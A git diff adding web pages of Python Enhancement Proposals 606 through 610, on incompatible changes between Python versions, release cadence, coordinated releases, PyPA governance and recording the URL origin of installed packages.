  • The C structure PyInterpreterState was made opaque. +
  • +
  • XML attribute order: bpo-34160. Broken projects: +
  • +
+

Backward compatibility cannot be added for all these changes. For +example, changes in the C API and in the build system are out of the +scope of this PEP.

+

See What’s New In Python 3.8: API and Feature Removals +for all changes.

+

See also the Porting to Python 3.8 +section of What’s New In Python 3.8.

+
+
+

Python 3.7

+

Examples of Python 3.7 incompatible changes:

+
    +
  • async and await are now reserved keywords.
  • +
  • Several undocumented internal imports were removed. One example is +that os.errno is no longer available; use import errno +directly instead. Note that such undocumented internal imports may be +removed any time without notice, even in micro version releases.
  • +
  • Unknown escapes consisting of '\' and an ASCII letter in +replacement templates for re.sub() were deprecated in Python 3.5, +and will now cause an error.
  • +
  • The asyncio.windows_utils.socketpair() function has been removed: +it was an alias to socket.socketpair().
  • +
  • asyncio no longer exports the selectors and _overlapped +modules as asyncio.selectors and asyncio._overlapped. Replace +from asyncio import selectors with import selectors.
  • +
  • PEP 479 is enabled for all code in Python 3.7, meaning that +StopIteration exceptions raised directly or indirectly in +coroutines and generators are transformed into RuntimeError +exceptions.
  • +
  • socketserver.ThreadingMixIn.server_close() now waits until all +non-daemon threads complete. Set the new block_on_close class +attribute to False to get the pre-3.7 behaviour.
  • +
  • The struct.Struct.format type is now str instead of +bytes.
  • +
  • repr for datetime.timedelta has changed to include the keyword +arguments in the output.
  • +
  • tracemalloc.Traceback frames are now sorted from oldest to most +recent to be more consistent with traceback.
  • +
+

Adding backward compatibility for most of these changes would be easy.

+

See also the Porting to Python 3.7 +section of What’s New In Python 3.7.

+
+
+

Micro releases

+

Sometimes, incompatible changes are introduced in micro releases +(micro in major.minor.micro) to fix bugs or security +vulnerabilities. Examples include:

+
    +
  • Python 3.7.2, compileall and py_compile module: the +invalidation_mode parameter’s default value is updated to None; +the SOURCE_DATE_EPOCH environment variable no longer +overrides the value of the invalidation_mode argument, and +determines its default value instead.
  • +
  • Python 3.7.1, xml modules: the SAX parser no longer processes +general external entities by default to increase security by default.
  • +
  • Python 3.5.2, os.urandom(): on Linux, if the getrandom() +syscall blocks (the urandom entropy pool is not initialized yet), fall +back on reading /dev/urandom.
  • +
  • Python 3.5.1, sys.setrecursionlimit(): a RecursionError +exception is now raised if the new limit is too low at the current +recursion depth.
  • +
  • Python 3.4.4, ssl.create_default_context(): RC4 was dropped from +the default cipher string.
  • +
  • Python 3.4.3, http.client: HTTPSConnection now performs all +the necessary certificate and hostname checks by default.
  • +
  • Python 3.4.2, email.message: EmailMessage.is_attachment() is +now a method instead of a property, for consistency with +Message.is_multipart().
  • +
  • Python 3.4.1, os.makedirs(name, mode=0o777, exist_ok=False): +Before Python 3.4.1, if exist_ok was True and the directory +existed, makedirs() would still raise an error if mode did not +match the mode of the existing directory. Since this behavior was +impossible to implement safely, it was removed in Python 3.4.1 +(bpo-21082).
  • +
+

Examples of changes made in micro releases which are not backward +incompatible:

+
    +
  • ssl.OP_NO_TLSv1_3 constant was added to 2.7.15, 3.6.3 and 3.7.0 +for backwards compatibility with OpenSSL 1.0.2.
  • +
  • typing.AsyncContextManager was added to Python 3.6.2.
  • +
  • The zipfile module accepts a path-like object since Python 3.6.2.
  • +
  • loop.create_future() was added to Python 3.5.2 in the asyncio +module.
  • +
+

No backward compatibility code is needed for these kinds of changes.

+
+
+
+

References

+

Accepted PEPs:

+ +

Draft PEPs:

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0606.rst

+

Last modified: 2024-08-20 10:29:32 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0607/index.html b/pep-0607/index.html new file mode 100644 index 00000000000..252be181ace --- /dev/null +++ b/pep-0607/index.html @@ -0,0 +1,315 @@ + + + + + + + + PEP 607 – Reducing CPython’s Feature Delivery Latency | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 607 – Reducing CPython’s Feature Delivery Latency

+
+
Author:
+
Łukasz Langa <lukasz at python.org>, +Steve Dower <steve.dower at python.org>, +Alyssa Coghlan <ncoghlan at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Final
+
Type:
+
Informational
+
Created:
+
11-Oct-2019
+
Python-Version:
+
3.9
+
Post-History:
+
20-Oct-2019
+
+
+
+
Table of Contents +
+
+

Abstract

+

PEP 602 and PEP 605 describe two alternative approaches to delivering smaller +collections of features to Python’s users more frequently (as compared to the +current approach of offering new feature releases every 18-24 months, with +the first binary alpha release taking place 6-8 months before the final release).

+

Both PEPs also propose moving to a release cadence that results in full releases +occurring at a consistent time of year (every year for PEP 602, every other +year for PEP 605).

+

This PEP (from the authors of both competing proposals) provides common +background on why a change in the release cadence is considered desirable, +as well as the perceived risks that both PEPs attempt to mitigate.

+
+
+

Rationale for change

+
+

Reducing the size of feature delivery batches

+

When multiple large changes are delivered together, a complex investigation +may be required to determine the root cause of any new issues that arise. +Large batch sizes also make it more likely that problems will be encountered, +given that they include larger pieces of relatively untested code.

+

The easiest way to simplify those investigations and reduce the likelihood of +users encountering problems is to reduce the size of the batches being shipped.

+

PEP 602 proposes to address this problem via the straightforward approach of +reducing CPython’s typical batch size by 50%, shipping 12 months of changes +each time, rather than accumulating 18+ months of changes.

+

PEP 605 proposes to address it by regularly delivering 2 months worth of changes +to a subset of Python’s user base that opts in to running a rolling stream of +beta releases (similar to running Windows Insider builds instead of the Windows +retail release, or running Debian testing instead of Debian stable).

+
+
+

Reducing the latency of feature delivery

+

When only stable releases are seeing significant user adoption, and there’s a +long period of time between stable releases, it creates an incredibly strong +temptation for developers to push changes into stable releases before they’re +really ready for general use.

+

PEP 602 proposes to address this problem by reducing the period of time +between stable releases to 12 months rather than 18 months.

+

PEP 605 proposes to address it by actively creating a community of +Python users that regularly install and use CPython beta releases, providing an +incentive for core developers to start shipping changes earlier in the +pre-release cycle, in order to obtain feedback before the feature gets locked +down in a stable release.

+
+
+

Aligning the release cadence with the calendar year

+

While the current release cadence is nominally 18-24 months, in practice it has +consistently been towards the 18 month end of that range. This means that the +target dates for pre-releases and final releases move around from release to +release, and the only way to remember them is to either look at the release PEP, +or else to add those dates to your calendar. This is annoying for both +individual volunteers and for corporate contributors, and also complicates +alignment with events like PyCon US (typically April/May) and the now-annual +core development sprints (typically in September).

+

PEP 602 proposes to address this problem by publishing a new release in October +every year, and basing the pre-release calendar for each year off that.

+

PEP 605 proposes to address this problem by alternating between release years +(where a new stable release is published in August), and non-release years +(where only maintenance releases and new rolling beta releases are published).

+
+
+

Improving the pre-release design feedback cycle

+

One of the challenges of designing changes to the core interpreter and standard +library APIs is that the user base in a position to provide feedback on +nightly builds and the current pre-releases is relatively limited. This means +that much user feedback isn’t received until after an API design has already +shipped in a full X.Y.0 release.

+

If the API is a regular API, then deprecation cycles mean that it may take +literally years to correct any design mistakes identified at that point. +Marking APIs as provisional nominally offers a way to avoid that constraint, +but actually taking advantage of that freedom causes other problems.

+

PEP 602 proposes to address this problem by starting the alpha period +immediately after the previous stable release.

+

PEP 605 proposes to address this problem by actively promoting adoption of +CPython pre-releases for running production workloads (not just for library and +application compatibility testing), and adjusting the pre-release management +process as necessary to make that a reasonable thing to do.

+

(Note: some standard library APIs are amenable to initially being shipped as +part of separately versioned packages via PyPI, and only later incorporated +into the standard library. This section is more about the lower level APIs +and non-library features where that approach to obtaining early design +feedback doesn’t apply)

+
+
+
+

Risks to be mitigated

+

While the status quo could stand to be improved in some respects, Python’s +popularity indicates that a lot of users and other participants in the wider +Python ecosystem are happy enough with the current release management process.

+

Python’s user base is too large and +too varied +to cover all the potential downsides of changing our release cadence here, so +instead this section just covers some of the points that have been specifically +taken into account in the design of the PEPs.

+
+

Impact on users and redistributors that already skip some releases

+

It is already the case that not all users and redistributors update to every +published CPython release series (for example, Debian stable and Ubuntu LTS +sometimes skip releases due to the mismatch between their 24-month release +cycles and CPython’s typically 18-month cycle).

+

The faster 12-month full release cadence in PEP 602 means that users in this +category may end up skipping two releases where they would previously have only +skipped one. However, the extended notice period for deprecations means that +skipping a single release should no longer result in missed deprecation warnings.

+

The slower 24-month full release cadence in PEP 605 may move some of the users +that have historically been in this category into the “update to every stable +release” category.

+
+
+

Impact on users and redistributors that update to every release

+

Many of Python’s users never install a pre-release, but do update to every +stable release series at some point after it is published.

+

PEP 602 aims to mitigate the potential negative impact on members of this group +by keeping the minimum gap between releases to 12 months, and retaining the +18 month full support period for each release.

+

Keeping the 18-month full support period for each release branch means that the +branches will spend roughly the same amount of time in full support and +security-fix-only mode as they do now (~18 months and ~42 months, respectively).

+

PEP 605 aims to mitigate the potential negative impact on members of this group +by increasing use during the pre-release period to achieve more stable final +releases with wider ecosystem support at launch.

+

With a 24-month release cadence each release branch will spend proportionally +more time in full support mode and less time in security-fix-only mode +(~24 months and ~36 months, respectively).

+

Full discussion of the impact on this group is left to the individual PEPs.

+
+
+

Impact on users and redistributors of CPython nightly builds

+

Despite the difficulties of doing so, there are already some users and +redistributors that take on the challenge of using or publishing the CPython +master branch directly.

+

Neither PEP 602 nor PEP 605 should directly affect this group, but the rolling +release stream proposal in PEP 605 aims to lower the barriers to more users +adopting this style of usage, by allowing them to adopt the tested rolling +beta stream, rather than needing to use the master branch directly.

+
+
+

Impact on maintainers of third party libraries

+

For maintainers of third party libraries, the key source of support complexity +is the number of different Python versions in widespread use.

+

PEP 602 aims to mitigate the potential negative impact on members of this group +by keeping the minimum gap between full releases to 12 months.

+

PEP 605 aims to mitigate the potential negative impact on members of this group +by increasing the gap between full releases to 24 months, retaining the current +policy of moving each release branch to security-fix-only mode not long after +its successor is released, and retaining the “beta” naming scheme for the new +rolling release stream (at least for the Python 3.9 release cycle).

+

Full discussion of the impact on this group is left to the individual PEPs.

+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0607.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0608/index.html b/pep-0608/index.html new file mode 100644 index 00000000000..9c5d896fca2 --- /dev/null +++ b/pep-0608/index.html @@ -0,0 +1,392 @@ + + + + + + + + PEP 608 – Coordinated Python release | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 608 – Coordinated Python release

+
+
Author:
+
Miro Hrončok <miro at hroncok.cz>, +Victor Stinner <vstinner at python.org>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
25-Oct-2019
+
Python-Version:
+
3.9
+
+
+
+
Table of Contents +
+
+

Abstract

+

Block a Python release until a compatible version of selected projects +is available.

+

The Python release manager can decide to release Python even if a +project is not compatible, if they decide that the project is going to +be fixed soon enough, or if the issue severity is low enough.

+
+
+

Rationale

+

The PEP involves maintainers of the selected projects in the Python +release cycle. There are multiple benefit:

+
    +
  • Detect more bugs before a Python final release
  • +
  • Discuss and maybe revert incompatible changes before a Python final +release
  • +
  • Increase the number of compatible projects when the new Python final +version is released
  • +
+
+

Too few projects are involved in the Python beta phase

+

Currently, Python beta versions are available four months before the +final 3.x.0 release.

+

Bugs reported during the beta phase can be easily fixed and can block a +release if they are serious enough.

+

Incompatible changes are discussed during the beta phase: enhance +documentation explaining how to update code, or consider to revert these +changes.

+

Even if more and more projects are tested on the master branch of Python +in their CI, too many projects of the top 50 PyPI projects are only +compatible with the new Python a few weeks, or even months, after the +final Python release.

+
+
+

DeprecationWarning is being ignored

+

Python has well defined process to deprecate features. A +DeprecationWarning must be emitted during at least one Python release, +before a feature can be removed.

+

In practice, DeprecationWarning warnings are ignored for years in major +Python projects. Usually, maintainers explain that there are too many +warnings and so they simply ignore warnings. Moreover, DeprecationWarning +is silent by default (except in the __main__ module: PEP 565).

+

Even if more and more projects are running their test suite with +warnings treated as errors (-Werror), Python core developers still +have no idea how many projects are broken when a feature is removed.

+
+
+

Need to coordinate

+

When issues and incompatible changes are discovered and discussed after +the final Python release, it becomes way more complicated and expensive +to fix Python. Once an API is part of an official final release, Python +should provide backward compatibility for the whole 3.x release +lifetime. Some operating systems can be shipped with the buggy final +release and can take several months before being updated.

+

Too many projects are only updated to the new Python after the final +Python release, which makes this new Python version barely usable to run +large applications when Python is released.

+

It is proposed to block a Python release until a compatible version of +all selected projects is available.

+
+
+

Shorter Python release schedule

+

The PEP 602: Annual Release Cycle for Python and the PEP 605: A +rolling feature release stream for CPython would like to release +Python more often to ship new features more quickly.

+

The problem is that each Python 3.x release breaks many projects.

+

Coordinated Python releases reduces the number of broken projects and +makes new Python release more usable.

+
+
+
+

Specification

+

By default, a Python release is blocked until a compatible version of +all selected projects is available.

+

Before releasing the final Python version, the Python release manager is +responsible to send a report of the compatibility status of each project +of the selected projects. It is recommended to send such report at +each beta release to see the evolution and detects issues as soon as +possible.

+

The Python release manager can decide to release Python even if a +project is not compatible, if they decide that the project is going to +be fixed soon enough, or if the issue severity is low enough.

+

After each Python release, the project list can be updated to remove +projects and add new ones. For example, to remove old unused +dependencies and add new ones. The list can grow if the whole process +doesn’t block Python releases for too long.

+
+

Limit the delay

+

When a build or test issue with the next Python version is reported to a +project, maintainers have one month to answer. With no answer, the +project can be excluded from the list of projects blocking the Python +release.

+

Multiple projects are already tested on the master branch of Python in a +CI. Problems can be detected very early in a Python release which should +provide enough time to handle them. More CI can be added for projects +which are not tested on the next Python yet.

+

Once selected projects issues are known, exceptions can be discussed +between the Python release manager and involved project maintainers on a +case-by-case basis. Not all issues deserve to block a Python release.

+
+
+

Selected projects

+

List of projects blocking a Python release (total: 27):

+
    +
  • Projects (13):
      +
    • aiohttp
    • +
    • cryptography
    • +
    • Cython
    • +
    • Django
    • +
    • numpy
    • +
    • pandas
    • +
    • pip
    • +
    • requests
    • +
    • scipy
    • +
    • Sphinx (needed to build Python)
    • +
    • sqlalchemy
    • +
    • pytest
    • +
    • tox
    • +
    +
  • +
  • Direct and indirect dependencies (14):
      +
    • certifi (needed by urllib3)
    • +
    • cffi (needed by cryptography)
    • +
    • chardet (needed by Sphinx)
    • +
    • colorama (needed by pip)
    • +
    • docutils (needed by Sphinx)
    • +
    • idna (needed by Sphinx and requests)
    • +
    • jinja2 (needed by Sphinx)
    • +
    • MarkupSafe (needed by Sphinx)
    • +
    • psycopg2 (needed by Django)
    • +
    • pycparser (needed by cffi)
    • +
    • setuptools (needed by pip and tons of Python projects)
    • +
    • six (needed by tons of Python projects)
    • +
    • urllib3 (needed by requests)
    • +
    • wheel (needed by pip)
    • +
    +
  • +
+
+
+

How projects are selected

+

Projects used by to build Python should be in the list, like Sphinx.

+

Most popular projects are picked from the most downloaded PyPI projects.

+

Most of project dependencies are included in the list as well, since a +single incompatible dependency can block a whole project. Some +dependencies are excluded to reduce the list length.

+

Test dependencies as pytest and tox should be included as well. If a +project cannot be tested, a new version cannot be shipped neither.

+

The list should be long enough to have a good idea of the cost of +porting a project to the next Python, but small enough to not block a +Python release for too long.

+

Obviously, projects which are not part of the list also are encouraged +to report issues with the next Python and to have a CI running on the +next Python version.

+
+
+
+

Incompatible changes

+

The definition here is large: any Python change which cause an issue +when building or testing a project.

+

See also the PEP 606: Python Compatibility Version for more examples of +incompatible changes.

+
+

Examples

+

There are different kinds of incompatible changes:

+
    +
  • Change in the Python build. For example, Python 3.8 removed 'm' +(which stands for pymalloc) from sys.abiflags which impacts Python +vendors like Linux distributions.
  • +
  • Change in the C extensions build. For example, Python 3.8 no longer +links C extensions to libpython, and Python 3.7 removed +os.errno alias to the errno module.
  • +
  • Removed function. For example, collections aliases to ABC classes +have been removed in Python 3.9.
  • +
  • Changed function signature:
      +
    • Reject a type which was previously accepted (ex: only accept int, +reject float).
    • +
    • Add a new mandatory parameter.
    • +
    • Convert a positional-or-keyword parameter to positional-only.
    • +
    +
  • +
  • Behavior change. For example, Python 3.8 now serializes XML attributes +in their insertion order, rather than sorting them by name.
  • +
  • New warning. Since more and more projects are tested with all warnings +treated as errors, any new warning can cause a project test to fail.
  • +
  • Function removed from the C API.
  • +
  • Structure made opaque in the C API. For example, PyInterpreterState +became opaque in Python 3.8 which broke projects accessing +interp->modules (PyImport_GetModuleDict() should be used +instead).
  • +
+
+
+

Cleaning up Python and DeprecationWarning

+

One of the Zen of Python (PEP 20) motto is:

+
+
There should be one– and preferably only one –obvious way to do +it.
+

When Python evolves, new ways emerge inevitably. DeprecationWarning +are emitted to suggest to use the new way, but many developers ignore +these warnings which are silent by default.

+

Sometimes, supporting both ways has a minor maintenance cost, but Python +core developers prefer to drop the old way to clean up the Python code +base and standard library. Such kind of change is backward incompatible.

+

More incompatible changes than usual should be expected with the end of +the Python 2 support which is a good opportunity to cleaning up old +Python code.

+
+
+
+

Distributed CI

+

Checking if selected projects are compatible with the master branch +of Python can be automated using a distributed CI.

+

Existing CIs can be reused.

+

New CIs can be added for projects which are not tested on the next +Python yet.

+

It is recommended to treat DeprecationWarning warnings as errors when +testing on the next Python.

+

A job testing a project on the next Python doesn’t have to be +“mandatory” (block the whole CI). It is fine to have failures during the +beta phase of a Python release. The job only has to pass for the final +Python release.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0608.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0609/index.html b/pep-0609/index.html new file mode 100644 index 00000000000..90e2af62138 --- /dev/null +++ b/pep-0609/index.html @@ -0,0 +1,417 @@ + + + + + + + + PEP 609 – Python Packaging Authority (PyPA) Governance | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 609 – Python Packaging Authority (PyPA) Governance

+
+
Author:
+
Dustin Ingram <di at python.org>, +Pradyun Gedam <pradyunsg at gmail.com>, +Sumana Harihareswara <sh at changeset.nyc>
+
Sponsor:
+
Paul Ganssle <paul at ganssle.io>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Active
+
Type:
+
Process
+
Topic:
+
Governance, Packaging
+
Created:
+
05-Nov-2019
+
Post-History:
+
05-Nov-2019
+
+
+
+
Table of Contents +
+
+

Abstract

+

This document describes a governance model for the Python Packaging +Authority (PyPA). The model is closely based on existing informal +practices, with the intent of providing clarity into the functioning +of the PyPA and formalizing transparent processes for the PyPA.

+
+
+

Rationale

+

The Python Packaging Authority (PyPA) is a collaborative community +that maintains and advances many of the relevant projects in Python +packaging. The software and standards developed through the PyPA are +used to package, share, and install Python software and to interact +with indexes of downloadable Python software such as PyPI, the +Python Package Index.

+

Currently, the PyPA is an informal and loosely defined organization +that lacks true authority, and the inclusion of a given project under +the PyPA umbrella or the creation of new projects has been done in an +ad-hoc, one-off manner. Similarly, individual membership in the PyPA +is not well-defined.

+

While this model has more or less worked for the PyPA in the past, it +results in an organization which is missing certain features of a +stable ecosystem, namely a clear and transparent decision-making +process. This PEP seeks to rectify this by defining a governance model +for the PyPA.

+
+
+

Terminology

+

Relevant terms for groups of individual contributors used in this PEP:

+
+
PyPA members:
Anyone with the triage bit or commit bit, on at least one project in +the PyPA organization.
+
PyPA committers:
Anyone with the commit bit on at least one project in the PyPA +organization, which should correspond to everyone on the +PyPA-Committers mailing list.
+
PyPA community:
Anyone who is interested in PyPA activity and wants to follow along, +contribute or make proposals.
+
Packaging-WG members:
As described in the Packaging-WG Wiki page. For clarity: there is no +formal relationship between the Packaging-WG and PyPA. This group is +only included in this list to disambiguate it from PyPA.
+
+
+
+

Goals

+

The following section formalizes the goals (and non-goals) of the PyPA +and this governance model.

+
+

Goals of the PyPA

+

These goals are the primary motivation for the existence of the PyPA. +These goals are largely already being carried out, even though most +have not been explicitly defined.

+
+

Provide support for existing projects under the PyPA

+

In the event that a given project needs additional support, or no +longer has active maintainers, the PyPA will ensure that the given +project will continue to be supported for users to the extent +necessary.

+
+
+

Foster the creation and acceptance of standards for PyPA projects

+

The PyPA should, as much as possible, strive for standardization and +coordination across PyPA projects, primarily though the governance +process outlined below. PyPA projects are expected to abide by +applicable specifications maintained by the PyPA.

+
+
+

Guide decisions which affect multiple PyPA projects

+

The PyPA community (especially PyPA members) should be expected to +provide opinions, insight and experience when ecosystem-wide changes +are being proposed.

+
+
+

Determine which projects should be under the guidance of the PyPA

+

For example: accepting new projects from the community, organically +creating projects within the PyPA, etc.

+
+
+

Enforce adherence to a Code of Conduct across all projects

+

Generally this means leading by example, but occasionally it may mean +more explicit moderation.

+
+
+
+

Non-goals of the PyPA

+

These are specific items that are explicitly _not_ goals of the PyPA.

+
+

Determine who is and isn’t a PyPA member

+

This is for members of individual projects to decide, as they add new +members to their projects. Maintainership of a project that is under +the PyPA organization automatically transfers membership in the PyPA.

+
+
+

Micromanage individual projects

+

As long as the project is adhering to the Code of Conduct and +following specifications supported by the PyPA, the PyPA should only +concerned with large, ecosystem-wide changes.

+
+
+

Develop and maintain standalone Code of Conduct

+

PyPA projects follow the PSF Code of Conduct.

+
+
+
+

Goals of the PyPA’s Governance Model

+

These are new goals which the governance model seeks to make possible.

+
+

Transparency in PyPA membership

+

Provide a transparent process for decisions taken, regarding project +membership in the PyPA.

+
+
+

Document PyPA’s use of PEPs

+

Formally document how the PyPA uses Python Enhancement Proposals +(PEPs), for maintaining interoperability specifications defined by the +PyPA.

+
+
+
+
+

Processes

+

The processes for the PyPA’s activities are outlined below:

+
+

Specifications

+

The PyPA will use PEPs for defining, and making changes to, the +interoperability specifications maintained by the PyPA. Thus, the +Python Steering Council has the final say in the acceptance of these +interoperability specifications.

+

It is expected (but not required) that the Python Steering Council +would delegate authority to sponsor and/or approve/reject PEPs related +to packaging interoperability specifications, to individuals within the +PyPA community. At the time of writing (June 2020), the Python Steering +Council has standing delegations for currently active packaging +interoperability specifications.

+

The details of the process of proposing and updating the +interoperability specifications are described in the PyPA +Specifications document.

+
+
+

Governance

+
+

PyPA Committer Votes

+

A PyPA member can put forward a proposal and call for a vote on a +public PyPA communication channel. A PyPA committer vote is triggered +when a PyPA committer (not the proposer) seconds the proposal.

+

The proposal will be put to a vote on the PyPA-Committers mailing +list, over a 7-day period. Each PyPA committer can vote once, and can +choose one of +1 and -1. If at least two thirds of recorded +votes are +1, then the vote succeeds.

+

PyPA committer votes are required for, and limited to, the following +kinds of proposals:

+
+
Addition of a project to the PyPA
+

Proposing the acceptance of a project into the PyPA organization. This +proposal must not be opposed by the existing maintainers of the +project.

+
+
+
Creation of a new project in the PyPA
+

Proposing the creation of a new tools / project in the PyPA +organization.

+
+
+
Removal of a project from PyPA
+

Proposing the removal of a project in the PyPA organization.

+
+
+
Updates to the Governance/Specification Processes
+

Proposing changes to how the PyPA operates, including but not limited +to changes to its specification and governance processes, and this +PEP.

+
+
+
+

Leaving PyPA

+

A project that is a part of the PyPA organization, can request to +leave PyPA.

+

Such requests can made by a committer of the project, on the +PyPA-Committers mailing list and must clearly state the GitHub +user/organization to transfer the repository to.

+

If the request is not opposed by another committer of the same project +over a 7-day period, the project would leave the PyPA and be +transferred out of the PyPA organization as per the request.

+
+
+

Code of Conduct enforcement

+

Each project that is a part of the PyPA organization follows the PSF +Code of Conduct, including its incident reporting guidelines and +enforcement procedures.

+

PyPA members are responsible for leading by example. PyPA members +occasionally may need to more explicitly moderate behavior in their +projects, and each project that is a part of the PyPA organization +must designate at least one PyPA member as available to contact in +case of a Code of Conduct incident. If told of any Code of Conduct +incidents involving their projects, PyPA members are expected to +report those incidents up to the PSF Conduct WG, for recording +purposes and for potential assistance.

+
+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0609.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0610/index.html b/pep-0610/index.html new file mode 100644 index 00000000000..057919e8fea --- /dev/null +++ b/pep-0610/index.html @@ -0,0 +1,661 @@ + + + + + + + + PEP 610 – Recording the Direct URL Origin of installed distributions | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 610 – Recording the Direct URL Origin of installed distributions

+
+
Author:
+
Stéphane Bidoul <stephane.bidoul at gmail.com>, Chris Jerdonek <chris.jerdonek at gmail.com>
+
Sponsor:
+
Alyssa Coghlan <ncoghlan at gmail.com>
+
BDFL-Delegate:
+
Pradyun Gedam <pradyunsg at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
21-Apr-2019
+
Post-History:
+

+
Resolution:
+
Discourse message
+
+
+
+
Table of Contents +
+
+

Attention

+

This PEP is a historical document. The up-to-date, canonical spec, Recording the Direct URL Origin of installed distributions, is maintained on the PyPA specs page.

+

×

+

See the PyPA specification update process for how to propose changes.

+
+
+

Abstract

+

Following PEP 440, a distribution can be identified by a name and either a +version, or a direct URL reference (see PEP440 Direct References). +After installation, the name and version are captured in the project metadata, +but currently there is no way to obtain details of the URL used when the +distribution was identified by a direct URL reference.

+

This proposal defines +additional metadata, to be added to the installed distribution by the +installation front end, which records the Direct URL Origin for use by +consumers which introspect the database of installed packages (see PEP 376).

+
+
+

Motivation

+

The original motivation of this PEP was to permit tools with a “freeze” +operation allowing a Python environment to be recreated to work in a broader +range of situations.

+

Specifically, the PEP originated from the desire to address pip issue #609: +i.e. improving the behavior of pip freeze in the presence of distributions +installed from direct URL references. It follows a +thread on discuss.python.org about the best course of action to implement +it.

+
+

Installation from direct URL references

+

Python installers such as pip are capable of downloading and installing +distributions from package indexes. They are also capable of downloading +and installing source code from requirements specifying arbitrary URLs of +source archives and Version Control Systems (VCS) repositories, +as standardized in PEP440 Direct References.

+

In other words, two relevant installation modes exist.

+
    +
  1. the package to install is specified as a name and version specifier:
  2. +
+
+
In this case, the installer looks in a package index (or optionally +using --find-links in the case of pip) to find the distribution to install.
+
    +
  1. The package to install is specified as a direct URL reference:
  2. +
+
+
In this case, the installer downloads whatever is specified by the URL +(typically a wheel, a source archive or a VCS repository) and installs it.

In this mode, installers typically download the source code in a +temporary directory, invoke the PEP 517 build backend to produce a wheel +if needed, install the wheel, and delete the temporary directory.

+

After installation, no trace of the URL the user requested to download the +package is left on the user system.

+
+
+
+

Freezing an environment

+

Pip also sports a command named pip freeze which examines the Database of +Installed Python Distributions to generate a list of requirements. The main +goal of this command is to help users generating a list of requirements that +will later allow the re-installation the same environment with the highest +possible fidelity.

+

As of pip version 19.3, the pip freeze command outputs a name==version +line for each installed +distribution (except for editable installs). To achieve the goal of +reinstalling the same environment, this requires the (name, version) +tuple to refer to an immutable version of the +distribution. The immutability is guaranteed by package indexes +such as Warehouse. The package index to use is typically known from +environmental or command line parameters of the installer.

+

This freeze mechanism therefore works fine for installation mode 1 (i.e. +when the package to install was specified as a name plus version specifier).

+

For installation mode 2, i.e. when the package to install was specified as a +direct URL reference, the name==version tuple is obviously not sufficient +to reinstall the same distribution and users of the freeze command expect it +to output the URL that was originally requested.

+

The reasoning above is equally applicable to tools, other than pip freeze, +that would attempt to generate a Pipfile.lock or any other similar format +from the Database of Installed Python Distributions. Unless specified +otherwise, “freeze” is used in this document as a generic term for such +an operation.

+
+
+

The importance of installing from (VCS) URLs for application integrators

+

For an application integrator, it is important to be able to reliably install +and freeze unreleased version of python distributions. +For instance when a developer needs to deploy an unreleased patched version +of a dependency, it is common to install the dependency directly from a VCS +branch that has the patch, while waiting for the maintainer to release an +updated version.

+

In such cases, it is important for “freeze” to pin the exact VCS +reference (commit-hash if available) that was installed, in order to create +reproducible builds with the highest possible fidelity.

+
+
+

Additional origin metadata available for VCS URLs

+

For VCS URLs, there is additional origin information available only at +install time useful for introspection and certain workflows. For example, +when installing a revision from a VCS URL, a tool can determine if the +revision corresponds to a branch, tag or (in the case of Git) a ref. This +information can be used when introspecting the Database of Installed Distributions +to communicate to users more information about what version was installed +(e.g. whether a branch or tag was installed and, if so, the name of the +branch or tag). This also permits one to know whether a PEP 440 direct +reference URL can be constructed using the tag form, as only tags have the +semantics of immutability.

+

In cases where the revision is mutable (e.g. branches and Git refs), knowing +this information enables workflows where users can e.g. update to the latest +version of a branch they are tracking, or update to the latest version of a +pull request they are reviewing locally. In contrast, when the revision is a +tag, tools can know in advance (e.g. without network calls) that no update is +needed.

+

As with the URL itself, if this information isn’t recorded at install time +when the VCS repository is available, it would otherwise be lost.

+
+
+

Note about “editable” installs

+

The editable installation mode of pip roughly lets a user insert a +local directory in sys.path for development purpose. This mode is somewhat +abused to work around the fact that a non-editable install from a VCS URL +loses track of the origin after installation. +Indeed, editable installs implicitly record the VCS origin in the checkout +directory, so the information can be recovered when running “freeze”.

+

The use of this workaround, although useful, is fragile, creates confusion +about the purpose of the editable mode, and works only when the distribution +can be installed with setuptools (i.e. it is not usable with other PEP 517 +build backends).

+

When this PEP is implemented, it will not be necessary anymore to use +editable installs for the purpose of making pip freeze work correctly with +VCS references.

+
+
+
+

Rationale

+

This PEP specifies a new direct_url.json metadata file in the +.dist-info directory of an installed distribution.

+

The fields specified are sufficient to reproduce the source archive and VCS +URLs supported by pip. They are also sufficient to reproduce +PEP440 Direct References, +as well as Pipfile and Pipfile.lock entries. Finally, they +are sufficient to record the branch, tag, and/or Git ref origin of the +installed version that is already available for editable installs by virtue +of a VCS checkout being present.

+

